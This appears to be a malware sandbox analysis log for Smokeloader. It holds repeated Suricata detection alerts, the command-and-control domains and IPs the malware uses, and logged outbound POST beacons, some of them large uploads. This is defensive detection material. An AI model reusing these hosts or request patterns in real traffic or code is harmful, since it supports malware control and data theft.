        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50283 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50150 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50222 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50288 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50386 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50128 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50156 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50138 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50255 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50276 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50305 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50287 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50131 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50163 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50125 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50091 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50257 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50159 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50292 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50242 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50178 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50161 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50309 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50290 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50297 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50148 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50165 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50126 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50166 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50310 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50200 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50301 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50245 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50293 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50363 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50095 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50169 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50311 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50176 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50180 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50167 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50315 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50162 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50323 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50225 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50096 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50364 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50271 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50322 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50177 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50302 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50205 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50316 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50183 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50172 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50327 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50186 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50122 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50226 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50378 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50328 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50279 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50182 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50318 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50212 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50347 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50196 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50333 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50190 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50379 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50144 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50194 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50243 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50220 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50329 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50191 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50285 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50384 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50342 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50380 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50216 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50344 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50197 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50232 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50202 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50326 -> 150.241.91.218:80
        Source: C:\Windows\explorer.exeNetwork Connect: 85.192.60.190 443Jump to behavior
        Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 150.241.91.218 80
        Source: Malware configuration extractorURLs: http://quantumqube.org/index.php
        Source: Malware configuration extractorURLs: https://quantumqube.org/index.php
        Source: Malware configuration extractorURLs: http://innovixus.org/index.php
        Source: Malware configuration extractorURLs: https://innovixus.org/index.php
        Source: Joe Sandbox ViewASN Name: LINEGROUP-ASRU LINEGROUP-ASRU
        Source: Joe Sandbox ViewASN Name: TECNALIAES TECNALIAES
        Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 150.241.91.218:80 -> 192.168.11.20:49754
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49751 -> 85.192.60.190:443
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyevwpjwtgxg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: quantumqube.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfeuyduiilfsy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://innovixus.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 3441Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://innovixus.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1605113Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnnmtmdpxvygnco.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygvupudcfqtouxhu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xspsemcvfgoiut.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjhnwrnkjwbushkd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jbnqovqgrlresuvo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jvdddppcdqqqda.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljcmwxchutvr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lufxgmktwrqcp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pyqjpqeimfnbipd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fggyvuvhssd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlfrlthjcrvobluk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cgsbdsjlngetne.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eukmigsrvyb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aydyulcorcfg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irahodakkogrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xynwwxaaxctjsnke.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ghsxueypspuw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxcstthegjtyiuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jegntitrwah.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fflfeclqdvs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqgpuokjonbaxi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lseeiaoqpwqavr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aijvngmrwrpbae.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aahwanpjvkrdt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vocyfosbdidhx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kybgadnxuheufnw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hehgxpqemmxhtl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljfejfsbbbqwrlh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayqexcuflcavkdwn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjroeqtdxjfutnwx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqirnpgtmfcswve.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfhkssmdhhy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omahgqfjhyfubyc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xsdqkghuelhdwm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkhduygqfshlmvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njnqechluueke.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tiemlhjlfkoejnes.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvusuaabwau.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axgnbkkukxdmk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gqgulsetucmpr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jiwkxehtxvsxfog.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amurpggwmqw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjbrruxfxfv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: innovixus.org
